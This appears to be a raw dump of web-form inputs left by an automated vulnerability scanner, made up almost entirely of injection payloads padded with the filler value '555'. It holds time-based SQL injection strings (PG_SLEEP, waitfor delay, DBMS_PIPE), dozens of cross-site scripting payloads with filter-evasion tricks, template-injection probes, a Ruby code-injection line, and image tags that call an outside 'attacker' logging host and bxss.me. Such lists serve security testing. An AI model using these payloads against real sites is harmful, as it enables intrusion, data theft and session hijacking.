-5 OR 117=(SELECT 117 FROM PG_SLEEP(15))--
555
'+'A'.concat(70-3).concat(22*4).concat(122).concat(79).concat(118).concat(83)+(require'socket'
Socket.gethostbyname('hitjo'+'lzrinhzp0f260.bxss.me.')[3].to_s)+'
555
555
new-online-store-is-open
http://hitqrvcifunqc.bxss.me/
555
555
new-online-store-is-open/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
/xfs.bxss.me
555
'"
555
if(now()=sysdate(),sleep(15),0)
555
<!--
555'"()&%<zzz><ScRiPt >zJdy(9977)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >zJdy(9338)</ScRiPt>
5559400258
bfg10185<s1﹥s2ʺs3ʹhjl10185
-5) OR 872=(SELECT 872 FROM PG_SLEEP(15))--
bfgx5571%C0%BEz1%C0%BCz2a%90bcxhjl5571
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
-1)) OR 573=(SELECT 573 FROM PG_SLEEP(15))--
555<ScRiPt >zJdy(9034)</ScRiPt>
555<WNNBMY>MGJHF[!+!]</WNNBMY>
555<script>zJdy(9549)</script>
555<ScR<ScRiPt>IpT>zJdy(9576)</sCr<ScRiPt>IpT>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555<ScRiPt
>zJdy(9041)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9882></ScRiPt>
25fWpJ0A' OR 832=(SELECT 832 FROM PG_SLEEP(15))--
555<isindex type=image src=1 onerror=zJdy(9269)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9288'>
555<body onload=zJdy(9172)>
555<img src=//xss.bxss.me/t/dot.gif onload=zJdy(9352)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<img src=xyz OnErRor=zJdy(9441)>
555<img/src=">" onerror=alert(9687)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%4A%64%79%289090%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\zJdy(9132)\u003C/sCripT\u003E
PGNuVnW1') OR 301=(SELECT 301 FROM PG_SLEEP(15))--
555<ScRiPt>zJdy(9392)</sCripT>
%F6<img zzz onmouseover=zJdy(93951) //%F6>
555<input autofocus onfocus=zJdy(9107)>
<a HrEF=http://xss.bxss.me></a>
-1; waitfor delay '0:0:15' --
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(zJdy(9594))}
555cBsMP
<ScRiPt >zJdy(9508)</ScRiPt>
555<WWKRDQ>6PI6I[!+!]</WWKRDQ>
HcFftd3E')) OR 766=(SELECT 766 FROM PG_SLEEP(15))--
555<ifRAme sRc=9053.com></IfRamE>
555<aERQq9E x=9692>
555<img sRc='http://attacker-9497/log.php?
555<a17hoXV<
-1); waitfor delay '0:0:15' --
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
-1)); waitfor delay '0:0:15' --
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
555
@@t4Ifv
555
555
555
555
1 waitfor delay '0:0:15' --
555
555
555
555
555
555
555
9b8QQjEz'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
T4IdYwZt'); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
sRpWTThS')); waitfor delay '0:0:15' --
555
555
555
555
555
-5 OR 572=(SELECT 572 FROM PG_SLEEP(15))--
555
-5) OR 959=(SELECT 959 FROM PG_SLEEP(15))--
555
-1)) OR 302=(SELECT 302 FROM PG_SLEEP(15))--
555
p6XJd51z' OR 652=(SELECT 652 FROM PG_SLEEP(15))--
555
5lC3dhsC') OR 209=(SELECT 209 FROM PG_SLEEP(15))--
555
5NUDfLp4')) OR 140=(SELECT 140 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@9OBuQ
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555


555'"()&%<zzz><ScRiPt >tF1u(9559)</ScRiPt>
555
'"()&%<zzz><ScRiPt >tF1u(9095)</ScRiPt>
555
5559632902
555
bfg6317<s1﹥s2ʺs3ʹhjl6317
555
bfgx10339%C0%BEz1%C0%BCz2a%90bcxhjl10339
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >tF1u(9159)</ScRiPt>
555<WM3ETN>YOUIC[!+!]</WM3ETN>
555
555<script>tF1u(9721)</script>
555
555<ScR<ScRiPt>IpT>tF1u(9109)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>tF1u(9740)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9997></ScRiPt>
555
555<isindex type=image src=1 onerror=tF1u(9901)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9557'>
555
555<body onload=tF1u(9510)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=tF1u(9020)>
555
555<img src=xyz OnErRor=tF1u(9353)>
555
555<img/src=">" onerror=alert(9668)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%46%31%75%289679%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\tF1u(9505)\u003C/sCripT\u003E
555
555<ScRiPt>tF1u(9185)</sCripT>
555
%F6<img zzz onmouseover=tF1u(95451) //%F6>
555
555<input autofocus onfocus=tF1u(9982)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(tF1u(9471))}
555
555qokY6
<ScRiPt >tF1u(9315)</ScRiPt>
555
555<WITDRR>F1JVD[!+!]</WITDRR>
555
555<ifRAme sRc=9472.com></IfRamE>
555
555<aRk0t3r x=9219>
555<img sRc='http://attacker-9629/log.php?
555
555<aJEytoE<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >3Jn4(9303)</ScRiPt>
555
555
555
555
555
'"()&%<zzz><ScRiPt >3Jn4(9131)</ScRiPt>
555
555
555
555
555
5559984118
555
555
555
555
555
bfg5800<s1﹥s2ʺs3ʹhjl5800
555
555
555
bfgx10215%C0%BEz1%C0%BCz2a%90bcxhjl10215
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >f6VA(9097)</ScRiPt>
<%={{={@{#{${dfb}}%>
555
555
555
555
'"()&%<zzz><ScRiPt >f6VA(9646)</ScRiPt>
555
555
<th:t="${dfb}#foreach
555
555
555
5559670850
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
bfg5498<s1﹥s2ʺs3ʹhjl5498
555
dfb{{98991*97996}}xca
555
555
555
555
bfgx4530%C0%BEz1%C0%BCz2a%90bcxhjl4530
555
dfb[[${98991*97996}]]xca
555
555
555
<%={{={@{#{${dfb}}%>
555
555
555
dfb__${98991*97996}__::.x
555'"()&%<zzz><ScRiPt >kemr(9138)</ScRiPt>
555'"()&%<zzz><ScRiPt >yR7N(9314)</ScRiPt>
555
555'"()&%<zzz><ScRiPt >Yn5B(9798)</ScRiPt>
<th:t="${dfb}#foreach
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
'"()&%<zzz><ScRiPt >yR7N(9664)</ScRiPt>
'"()&%<zzz><ScRiPt >kemr(9960)</ScRiPt>
'"()&%<zzz><ScRiPt >Yn5B(9567)</ScRiPt>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555<ScRiPt >3Jn4(9863)</ScRiPt>
5559015585
555
555
5559191085
555
5559668944
555
555
555
555<WERQJK>0MSRF[!+!]</WERQJK>
555
bfg10233<s1﹥s2ʺs3ʹhjl10233
555
555
bfg8322<s1﹥s2ʺs3ʹhjl8322
bfg6603<s1﹥s2ʺs3ʹhjl6603
dfb{{98991*97996}}xca
555
555<script>3Jn4(9888)</script>
555
555
bfgx9131%C0%BEz1%C0%BCz2a%90bcxhjl9131
555
555
bfgx5531%C0%BEz1%C0%BCz2a%90bcxhjl5531
bfgx6893%C0%BEz1%C0%BCz2a%90bcxhjl6893
555
dfb[[${98991*97996}]]xca
555
555<ScR<ScRiPt>IpT>3Jn4(9689)</sCr<ScRiPt>IpT>
555
<%={{={@{#{${dfb}}%>
555
<%={{={@{#{${dfb}}%>
555
<%={{={@{#{${dfb}}%>
555
dfb__${98991*97996}__::.x
555
555
555
555
555
555<ScRiPt
>3Jn4(9236)</ScRiPt>
555
555
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9435></ScRiPt>
<th:t="${dfb}#foreach
555
<th:t="${dfb}#foreach
<th:t="${dfb}#foreach
555
555<ScRiPt >f6VA(9258)</ScRiPt>
555
555
555
555
555
555
555<WRLOLP>QJMH1[!+!]</WRLOLP>
555
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555<isindex type=image src=1 onerror=3Jn4(9867)>
555
555<script>f6VA(9268)</script>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
555
555
555<ScR<ScRiPt>IpT>f6VA(9141)</sCr<ScRiPt>IpT>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9801'>
555
555
555
555
555
555
dfb{{98991*97996}}xca
555
555<ScRiPt
>f6VA(9569)</ScRiPt>
555<body onload=3Jn4(9522)>
555
555
555
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
555
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9426></ScRiPt>
555
555<img src=//xss.bxss.me/t/dot.gif onload=3Jn4(9351)>
dfb[[${98991*97996}]]xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
555
555<img src=xyz OnErRor=3Jn4(9822)>
555
dfb__${98991*97996}__::.x
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<img/src=">" onerror=alert(9890)>
555
555
555<isindex type=image src=1 onerror=f6VA(9076)>
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >yR7N(9687)</ScRiPt>
555
555
555
555
555<ScRiPt >Yn5B(9764)</ScRiPt>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9402'>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%33%4A%6E%34%289626%29%3C%2F%73%43%72%69%70%54%3E
555<WDOHGV>LZBU5[!+!]</WDOHGV>
555<ScRiPt >kemr(9312)</ScRiPt>
555
555
555
555
555<W6WJ43>VGN1S[!+!]</W6WJ43>
555<body onload=f6VA(9934)>
555
555\u003CScRiPt\3Jn4(9804)\u003C/sCripT\u003E
555<script>yR7N(9990)</script>
555
555<WMX2FN>3LFGO[!+!]</WMX2FN>
555
555<script>Yn5B(9229)</script>
555<img src=//xss.bxss.me/t/dot.gif onload=f6VA(9357)>
555
555
555
555<ScRiPt>3Jn4(9291)</sCripT>
555<ScR<ScRiPt>IpT>yR7N(9605)</sCr<ScRiPt>IpT>
555
555<script>kemr(9736)</script>
555<img src=xyz OnErRor=f6VA(9920)>
555
555<ScR<ScRiPt>IpT>Yn5B(9254)</sCr<ScRiPt>IpT>
555
555
555
%F6<img zzz onmouseover=3Jn4(92891) //%F6>
555<ScRiPt
>yR7N(9078)</ScRiPt>
555
555
555<ScRiPt
>Yn5B(9711)</ScRiPt>
555<ScR<ScRiPt>IpT>kemr(9775)</sCr<ScRiPt>IpT>
555
555<img/src=">" onerror=alert(9964)>
555
555
555<input autofocus onfocus=3Jn4(9949)>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9433></ScRiPt>
555
555<ScRiPt
>kemr(9068)</ScRiPt>
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%66%36%56%41%289969%29%3C%2F%73%43%72%69%70%54%3E
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9073></ScRiPt>
555
555
<a HrEF=http://xss.bxss.me></a>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9065></ScRiPt>
555
555\u003CScRiPt\f6VA(9069)\u003C/sCripT\u003E
555
<a HrEF=jaVaScRiPT:>
555<isindex type=image src=1 onerror=yR7N(9526)>
555<ScRiPt>f6VA(9158)</sCripT>
555}body{zzz:Expre/**/SSion(3Jn4(9406))}
555<isindex type=image src=1 onerror=Yn5B(9062)>
555<isindex type=image src=1 onerror=kemr(9015)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9816'>
%F6<img zzz onmouseover=f6VA(99391) //%F6>
5551QqUg
<ScRiPt >3Jn4(9794)</ScRiPt>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9099'>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9199'>
555<body onload=yR7N(9814)>
555<input autofocus onfocus=f6VA(9456)>
555<WZCMHX>G0SOZ[!+!]</WZCMHX>
555<body onload=Yn5B(9516)>
555<body onload=kemr(9893)>
555<img src=//xss.bxss.me/t/dot.gif onload=yR7N(9401)>
<a HrEF=http://xss.bxss.me></a>
555<ifRAme sRc=9565.com></IfRamE>
555<img src=//xss.bxss.me/t/dot.gif onload=Yn5B(9331)>
555<img src=xyz OnErRor=yR7N(9489)>
555<img src=//xss.bxss.me/t/dot.gif onload=kemr(9489)>
<a HrEF=jaVaScRiPT:>
555<apzx975 x=9042>
555<img src=xyz OnErRor=Yn5B(9400)>
555<img/src=">" onerror=alert(9485)>
555<img src=xyz OnErRor=kemr(9337)>
555}body{zzz:Expre/**/SSion(f6VA(9481))}
555<img sRc='http://attacker-9802/log.php?
555<img/src=">" onerror=alert(9014)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%79%52%37%4E%289387%29%3C%2F%73%43%72%69%70%54%3E
555<aEa8G6s<
555<img/src=">" onerror=alert(9102)>
555TdKnK
<ScRiPt >f6VA(9926)</ScRiPt>
%35%35%35%3C%53%63%52%69%50%74%20%3E%59%6E%35%42%289557%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\yR7N(9459)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%6B%65%6D%72%289927%29%3C%2F%73%43%72%69%70%54%3E
555<WJLY88>TZPDD[!+!]</WJLY88>
555<ScRiPt>yR7N(9174)</sCripT>
555\u003CScRiPt\Yn5B(9274)\u003C/sCripT\u003E
555\u003CScRiPt\kemr(9889)\u003C/sCripT\u003E
555<ifRAme sRc=9680.com></IfRamE>
%F6<img zzz onmouseover=yR7N(90901) //%F6>
555<ScRiPt>Yn5B(9686)</sCripT>
555<ScRiPt>kemr(9340)</sCripT>
555<apZJAGy x=9963>
555<input autofocus onfocus=yR7N(9618)>
%F6<img zzz onmouseover=Yn5B(91721) //%F6>
555<img sRc='http://attacker-9735/log.php?
%F6<img zzz onmouseover=kemr(97631) //%F6>
<a HrEF=http://xss.bxss.me></a>
555<input autofocus onfocus=Yn5B(9812)>
555<aBzIjYK<
555<input autofocus onfocus=kemr(9476)>
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
555}body{zzz:Expre/**/SSion(yR7N(9133))}
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
<a HrEF=jaVaScRiPT:>
555C2zbx
<ScRiPt >yR7N(9409)</ScRiPt>
555}body{zzz:Expre/**/SSion(Yn5B(9771))}
555}body{zzz:Expre/**/SSion(kemr(9890))}
555<WBA32Q>P9P2P[!+!]</WBA32Q>
555rGLO4
<ScRiPt >Yn5B(9221)</ScRiPt>
555<ifRAme sRc=9803.com></IfRamE>
555arLOn
<ScRiPt >kemr(9264)</ScRiPt>
555<WGBCNY>ZLTC7[!+!]</WGBCNY>
555<aufhcan x=9228>
555<W5SE3X>OAXGR[!+!]</W5SE3X>
555<ifRAme sRc=9800.com></IfRamE>
555<img sRc='http://attacker-9141/log.php?
555<ifRAme sRc=9682.com></IfRamE>
555<aTFQJt3 x=9062>
555<a3eavZg<
555<avEwbbq x=9353>
555<img sRc='http://attacker-9515/log.php?
555<img sRc='http://attacker-9625/log.php?
555<abREXtt<
555<aPSBLDn<
555'"()&%<zzz><ScRiPt >VTIg(9193)</ScRiPt>
555
'"()&%<zzz><ScRiPt >VTIg(9742)</ScRiPt>
555
5559037037
555
bfg4765<s1﹥s2ʺs3ʹhjl4765
555
bfgx4342%C0%BEz1%C0%BCz2a%90bcxhjl4342
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >VTIg(9637)</ScRiPt>
555
555<W3QEJD>CO05V[!+!]</W3QEJD>
555
555<script>VTIg(9422)</script>
555
555<ScR<ScRiPt>IpT>VTIg(9340)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>VTIg(9517)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9025></ScRiPt>
555
555<isindex type=image src=1 onerror=VTIg(9501)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9687'>
555
555<body onload=VTIg(9172)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=VTIg(9382)>
555
555<img src=xyz OnErRor=VTIg(9151)>
555
555<img/src=">" onerror=alert(9822)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%56%54%49%67%289546%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\VTIg(9003)\u003C/sCripT\u003E
555
555<ScRiPt>VTIg(9372)</sCripT>
555
%F6<img zzz onmouseover=VTIg(92221) //%F6>
555
555<input autofocus onfocus=VTIg(9605)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(VTIg(9696))}
555
555WLHuT
<ScRiPt >VTIg(9722)</ScRiPt>
555
555<WLWH0I>JJAEF[!+!]</WLWH0I>
555
555<ifRAme sRc=9968.com></IfRamE>
555
555<a24OAMc x=9761>
555
555
555<img sRc='http://attacker-9910/log.php?
555<aAqYped<
555
555